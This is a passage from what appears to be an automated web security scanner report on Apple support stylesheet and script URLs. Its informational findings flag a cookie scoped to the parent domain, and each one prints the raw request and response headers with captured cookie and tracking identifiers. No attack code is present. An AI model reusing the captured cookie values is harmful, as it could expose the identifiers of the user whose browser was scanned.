User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "2aad-49aaf2c896a00"
If-Modified-Since: Tue, 25 Jan 2011 17:37:44 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Tue, 25 Jan 2011 17:37:44 GMT
ETag: "2aad-49aaf2c896a00"
Cache-Control: max-age=496
Expires: Thu, 21 Jul 2011 20:40:00 GMT
Date: Thu, 21 Jul 2011 20:31:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=/0ZX3eGtiz2N94LlrQRAkZzAM+tGhYMUJSxai0bwmBeI1dPPensQzY5Uty9ZlIOHIQTx3e60zFhRD6wMXmWNG926Lth/b8RjLMVCfZb7D5XbT3Dzmd93c9FsycW4PERXlZ3ycvoryZdz3+iNSPpF3jEkd6Iwedo6DKUcJxXiQPCmsq5B84TnqodRXIN41Os5MruCRagHNPml/PD83fqlyrp6Eah4dm713c10yU4DSe1ssFcZvJzMH1XiGUVgR8AZ0+k/K05YPhEhI01J2gZZji3qMvx5EphMLLteB32mWkWl3MNORmRAc6Fe+Tv8sV/ouT1xqrrb3C/9/vo3FPNIriwgYfHEUNRkaIYOGop4a9qfJk000LhgniRfVILO3khuwz54LEFRo+YplE//mp0nfYtMIpx3APNNKWmGpMqtElXz56voDUL5BEaC4Us1LVf6+0jaDoOhN/v9wIUOAQQ1xdU0uHO9YxmpWdWyHmQ4QTRGrK2eitc0M4r0/o8m+Hz+bzeUNNa7KrYyHu4O7h1CPxw1C1SET9/ArTDAGFrHfmWoFrXBm15q3+AkSAwWEteZ; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.101. http://images.apple.com/support/css/global/nav/navigation.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/css/global/nav/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=y2zX0827C42NiOhmmL1InVWjcrGn40mRx8x7XyyYPFx1i+PinVQJQ5R5UvcDCrje7voysmLwI3gzWPmapj0sfjq6icY2ssQq/R6qK23/seLcMtkzor+8AYTSTelX8HocksDSOfxX2Zu27VLSH90TrQBr1NuqUYeJxBJEOntUMWehWDfcc4Zs013zwq4ICnv/dILW2btK0xQ1/VUUbe7cuAk6/tYIKS2NM2ZciOxnybIOf7XcUWvVo2eQtkxYB/NJzHn2SpbJKxqbP/QybCk0PdRtB/v3gC5soIK6P59QJRyKksTvA1WYByroUYoF6Rol7cuPREdX73N5A0ls/nv+L8w+B6TQJyifTGADdeRBNsaaU6Z+e9lX9vb6+jZBe4OrIflOTuHH8Ip01PH4qjCuMfugBF67v9GFpKmPi1XViSUrKiedDF6dHleQnvzCY24p6omSi6WIFEUn+dTRWkyUJjTQS6p8vSBQbBobqABA/CO9Dg3+nMuJ5WPrfEfV8y8zLdLa+m38oDPMpLOwjGuvn2liGwUBhf9GfKKfxOijl843dP2ExkOysse0ygPpk87+; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/css/global/nav/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "126-49a9c5c7b4200"
If-Modified-Since: Mon, 24 Jan 2011 19:11:04 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Mon, 24 Jan 2011 19:11:04 GMT
ETag: "126-49a9c5c7b4200"
Cache-Control: max-age=386
Expires: Thu, 21 Jul 2011 20:38:10 GMT
Date: Thu, 21 Jul 2011 20:31:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=y2zX0827C42NiOhmmL1InVWjcrGn40mRx8x7XyyYPFx1i+PinVQJQ5R5UvcDCrje7voysmLwI3gzWPmapj0sfjq6icY2ssQq/R6qK23/seLcMtkzor+8AYTSTelX8HocksDSOfxX2Zu27VLSH90TrQBr1NuqUYeJxBJEOntUMWehWDfcc4Zs013zwq4ICnv/dILW2btK0xQ1/VUUbe7cuAk6/tYIKS2NM2ZciOxnybIOf7XcUWvVo2eQtkxYB/NJzHn2SpbJKxqbP/QybCk0PdRtB/v3gC5soIK6P59QJRyKksTvA1WYByroUYoF6Rol7cuPREdX73N5A0ls/nv+L8w+B6TQJyifTGADdeRBNsaaU6Z+e9lX9vb6+jZBe4OrIflOTuHH8Ip01PH4qjCuMfugBF67v9GFpKmPi1XViSUrKiedDF6dHleQnvzCY24p6omSi6WIFEUn+dTRWkyUJjTQS6p8vSBQbBobqABA/CO9Dg3+nMuJ5WPrfEfV8y8zLdLa+m38oDPMpLOwjGuvn2liGwUBhf9GfKKfxOijl843dP2ExkOysse0ygPpk87+; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.102. http://images.apple.com/support/css/suggest2.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/css/suggest2.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=TdFxxK7XwGhvsKHfHII+mK0EzwI1AArHXsT8wlld8yJ6EcjP2MPmle1zSM1FmP+iwuWWHfsPyn9MWINOJq6vCoIg/GhLsCKsxPgyKeaz3d+KLsrsvNtckaiRo6wLJ+TcGlal4bHV9i41wEbk437fkuhMjyZksWdveLjxV1Vh8N8yAZJ5FfZXhm8upH5HxYlNjJnykqNpMpWUIN4FsD50t47pToBzsCzDECRpKn2bh9R3HAPD8UzKr/mUNelHXqRxqj9d81rpwV4EnXqHKc6cVSTPbyP7eMNkGGXG1nWXMCWdA+gPwfQhcmd+PYJs/2iYlsFJWGPxfFK1Q+FBKx3WSoNHzqXjilZS4se/MIs8cTf3P0NCXM4wbwJf0oHNxO8HrmnZ345dqRKTUsYtcR3B2rYN34JVhA89JOTssOU4g40St10+bioT+G6qGRgE5RDKjZ2IsO6UrrXHaR15yflphsjF4vhlQ5hjMwPOZ8xlDuy2g2KRLDZDihpa71abZqZVGq1/vrAcwf4canQ9uqbhJ7rSOjm2bPnXrPnd9Km65JrHJAChFfgQ4jnh6egASosF; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/css/suggest2.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "17b-49a630dee3f40"
If-Modified-Since: Fri, 21 Jan 2011 22:48:53 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Fri, 21 Jan 2011 22:48:53 GMT
ETag: "17b-49a630dee3f40"
Cache-Control: max-age=398
Expires: Thu, 21 Jul 2011 20:38:22 GMT
Date: Thu, 21 Jul 2011 20:31:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=TdFxxK7XwGhvsKHfHII+mK0EzwI1AArHXsT8wlld8yJ6EcjP2MPmle1zSM1FmP+iwuWWHfsPyn9MWINOJq6vCoIg/GhLsCKsxPgyKeaz3d+KLsrsvNtckaiRo6wLJ+TcGlal4bHV9i41wEbk437fkuhMjyZksWdveLjxV1Vh8N8yAZJ5FfZXhm8upH5HxYlNjJnykqNpMpWUIN4FsD50t47pToBzsCzDECRpKn2bh9R3HAPD8UzKr/mUNelHXqRxqj9d81rpwV4EnXqHKc6cVSTPbyP7eMNkGGXG1nWXMCWdA+gPwfQhcmd+PYJs/2iYlsFJWGPxfFK1Q+FBKx3WSoNHzqXjilZS4se/MIs8cTf3P0NCXM4wbwJf0oHNxO8HrmnZ345dqRKTUsYtcR3B2rYN34JVhA89JOTssOU4g40St10+bioT+G6qGRgE5RDKjZ2IsO6UrrXHaR15yflphsjF4vhlQ5hjMwPOZ8xlDuy2g2KRLDZDihpa71abZqZVGq1/vrAcwf4canQ9uqbhJ7rSOjm2bPnXrPnd9Km65JrHJAChFfgQ4jnh6egASosF; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.103. http://images.apple.com/support/css/support.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/css/support.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=Ky+IPnhAs1w4J1fgLh/0Btv4CFTWH0oWnvNXYnVDtheHLkuBA4IuQUXMnDjdsuqwNio7AgOKpr0wpvTPX7l/vJvZlpycXTpvup1G8x+0QxIcYNWZNT0Gq8hm0JdQ5BE84XNcmbllD9FMKJ7WpbhFbkzcrHQQz9BOqfPyXzYPxdUap8sQxDi2LCg9ekmfFDcaeT9Z36QP+zP7scXvVK99ri01ltP0Ag/zITzXipquzvtRj7ZkaMQmH1WgDZa41vYfF8Q2T3SDiP3lggUC4sw10eKjs6Y7DUdMTFJN0UEtMzrMPo58ztdJHhETif/rBvVkLUe3Xyk4KejfA6CdNgJdSNHyPwWGcCeJCFi5DPGPg8zBLa+xUCeq4YILvCwFhqTMjqO5huysxRwX7oue8PkTBqIMJXD7y8N50Lz9S57XdGPK9KdskiogRW1bPMK+tONm0tScOLUIo7Q1BfpcTiqxIaa/TS8xJe3StKH1TihKH+CHgQXc37n3A5M300pGggbl4xyTFNH/Cp1Jkg8J6W9BK7vDTJWCrqEtyYNAgBCW9+3foQAvfVc30kDfP5qWCesD; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/css/support.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "4f44-49aaf24d907c0"
If-Modified-Since: Tue, 25 Jan 2011 17:35:35 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Tue, 25 Jan 2011 17:35:35 GMT
ETag: "4f44-49aaf24d907c0"
Cache-Control: max-age=542
Expires: Thu, 21 Jul 2011 20:40:46 GMT
Date: Thu, 21 Jul 2011 20:31:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=Ky+IPnhAs1w4J1fgLh/0Btv4CFTWH0oWnvNXYnVDtheHLkuBA4IuQUXMnDjdsuqwNio7AgOKpr0wpvTPX7l/vJvZlpycXTpvup1G8x+0QxIcYNWZNT0Gq8hm0JdQ5BE84XNcmbllD9FMKJ7WpbhFbkzcrHQQz9BOqfPyXzYPxdUap8sQxDi2LCg9ekmfFDcaeT9Z36QP+zP7scXvVK99ri01ltP0Ag/zITzXipquzvtRj7ZkaMQmH1WgDZa41vYfF8Q2T3SDiP3lggUC4sw10eKjs6Y7DUdMTFJN0UEtMzrMPo58ztdJHhETif/rBvVkLUe3Xyk4KejfA6CdNgJdSNHyPwWGcCeJCFi5DPGPg8zBLa+xUCeq4YILvCwFhqTMjqO5huysxRwX7oue8PkTBqIMJXD7y8N50Lz9S57XdGPK9KdskiogRW1bPMK+tONm0tScOLUIo7Q1BfpcTiqxIaa/TS8xJe3StKH1TihKH+CHgQXc37n3A5M300pGggbl4xyTFNH/Cp1Jkg8J6W9BK7vDTJWCrqEtyYNAgBCW9+3foQAvfVc30kDfP5qWCesD; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.104. http://images.apple.com/support/home/css/home2011.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/home/css/home2011.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=BrrKfyxbkX/V70rgbnyYChuybSz5m7J1+h6gWosxKcG9mKdKD/dhBe31bDbJznz7MU7lg0UhfMb4tls5bxPTE4052U4Pb5f8coy7ZfT+aTQann9QAclyeEBIH4Sj/9rG2sXXxWHR+h0zXZS2frG8al9ICOA0rimCJl7FW6Z9rStOuAZnQq+WHF2x9Y02R0W8G3IqNMHAtDMNu6CqPsSByCVje7q0c7R9ymfob97sJntC7iY0UDSLBfS0mPMB0mRXLazBOiO1FSEP29g1OzFPZ4+D2ecgDj6R14lp4XTHTR4OKAPpzCye+QllhhMXrei5CZi6DSNUC14Bds51GdJIUqaBf7maLWCALPxezRn0GNJsHglZ4jvG42nsbi/l0gf9Lxp1d1TtQstC2epHyUjBd6DXGNgJuTySbN8Q+kNf0ECLNzlnK/61BdCSY/aUDkUwZg7cHo94XpAesttapyfqlEDi9XhQLE1YNYZTdcwk9zJq25kcST6LGEVM8TXbzIqn+TEJ0R0CPsSvfIzLoTmGMaMEC6xHRSuLjemQUwbeRC8OW+/iEH5ewG/gkSyBt7Dy; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/home/css/home2011.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "187a-4a6b47f1131c0"
If-Modified-Since: Mon, 27 Jun 2011 17:01:03 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Mon, 27 Jun 2011 17:01:03 GMT
ETag: "187a-4a6b47f1131c0"
Cache-Control: max-age=436
Expires: Thu, 21 Jul 2011 20:39:00 GMT
Date: Thu, 21 Jul 2011 20:31:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=BrrKfyxbkX/V70rgbnyYChuybSz5m7J1+h6gWosxKcG9mKdKD/dhBe31bDbJznz7MU7lg0UhfMb4tls5bxPTE4052U4Pb5f8coy7ZfT+aTQann9QAclyeEBIH4Sj/9rG2sXXxWHR+h0zXZS2frG8al9ICOA0rimCJl7FW6Z9rStOuAZnQq+WHF2x9Y02R0W8G3IqNMHAtDMNu6CqPsSByCVje7q0c7R9ymfob97sJntC7iY0UDSLBfS0mPMB0mRXLazBOiO1FSEP29g1OzFPZ4+D2ecgDj6R14lp4XTHTR4OKAPpzCye+QllhhMXrei5CZi6DSNUC14Bds51GdJIUqaBf7maLWCALPxezRn0GNJsHglZ4jvG42nsbi/l0gf9Lxp1d1TtQstC2epHyUjBd6DXGNgJuTySbN8Q+kNf0ECLNzlnK/61BdCSY/aUDkUwZg7cHo94XpAesttapyfqlEDi9XhQLE1YNYZTdcwk9zJq25kcST6LGEVM8TXbzIqn+TEJ0R0CPsSvfIzLoTmGMaMEC6xHRSuLjemQUwbeRC8OW+/iEH5ewG/gkSyBt7Dy; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.105. http://images.apple.com/support/iknow/scripts/ACQuicklinks2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/iknow/scripts/ACQuicklinks2.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=tmPjHWJRCJr07YFWPmKj4uzQva5U9xlEFPoMv2KODxJJaAECPt3oYIqsPV+vIIHK79qKAtLC1M1D/whD6ucvIw0sX068SxtsZ7ItOsLgZag8aMO78zVv3ffFH5xNq14BWnBMpEQJoQrjV7Yk0L71OU/cznHkn1ZJbkgihC4CNjuc3d5dF5nUKmvwmpf3FlX+VgNE9qsiKoEFrjERi1xqRY0uCpQlaSct7d1jNUXmzkQZV2RIisgIdEN8bWuWzV73ewShyfRTrjzvrG1g3To3Iy0TdhE2es5MwJYVYI5Ry3S+99excjgrcse+Wukao7ZPwCGAUBTNiqgyHPLyAKT55Z6C4CuEcsF/YqHD+9YiedNyUp+ekx0p81bJL5/h9NVPVyDA3sBPlRD6NlNqug6AyENo+61kcR8fmBz0bjCDLOuqQPErhuMlQw6KXjv91ykyCpWBjgWlVwNxDGmSH5rkWG1OMlxlxi0iSK0B5IROP02HATKMzpSi3noRxaGvbCB5eb7/wTJuCiGtQ/L7hWlGdUgsnu3YMDujcvs0lEGoucZkYeWUuuZRvMH5Eqb3ce/9; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/iknow/scripts/ACQuicklinks2.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "2344-4a04933ebf0c0"
If-Modified-Since: Thu, 07 Apr 2011 00:29:31 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Apr 2011 00:29:31 GMT
ETag: "2344-4a04933ebf0c0"
Cache-Control: max-age=486
Expires: Thu, 21 Jul 2011 20:39:53 GMT
Date: Thu, 21 Jul 2011 20:31:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=tmPjHWJRCJr07YFWPmKj4uzQva5U9xlEFPoMv2KODxJJaAECPt3oYIqsPV+vIIHK79qKAtLC1M1D/whD6ucvIw0sX068SxtsZ7ItOsLgZag8aMO78zVv3ffFH5xNq14BWnBMpEQJoQrjV7Yk0L71OU/cznHkn1ZJbkgihC4CNjuc3d5dF5nUKmvwmpf3FlX+VgNE9qsiKoEFrjERi1xqRY0uCpQlaSct7d1jNUXmzkQZV2RIisgIdEN8bWuWzV73ewShyfRTrjzvrG1g3To3Iy0TdhE2es5MwJYVYI5Ry3S+99excjgrcse+Wukao7ZPwCGAUBTNiqgyHPLyAKT55Z6C4CuEcsF/YqHD+9YiedNyUp+ekx0p81bJL5/h9NVPVyDA3sBPlRD6NlNqug6AyENo+61kcR8fmBz0bjCDLOuqQPErhuMlQw6KXjv91ykyCpWBjgWlVwNxDGmSH5rkWG1OMlxlxi0iSK0B5IROP02HATKMzpSi3noRxaGvbCB5eb7/wTJuCiGtQ/L7hWlGdUgsnu3YMDujcvs0lEGoucZkYeWUuuZRvMH5Eqb3ce/9; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.106. http://images.apple.com/support/iknow/scripts/ACShortcuts.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/iknow/scripts/ACShortcuts.js

Issue detail

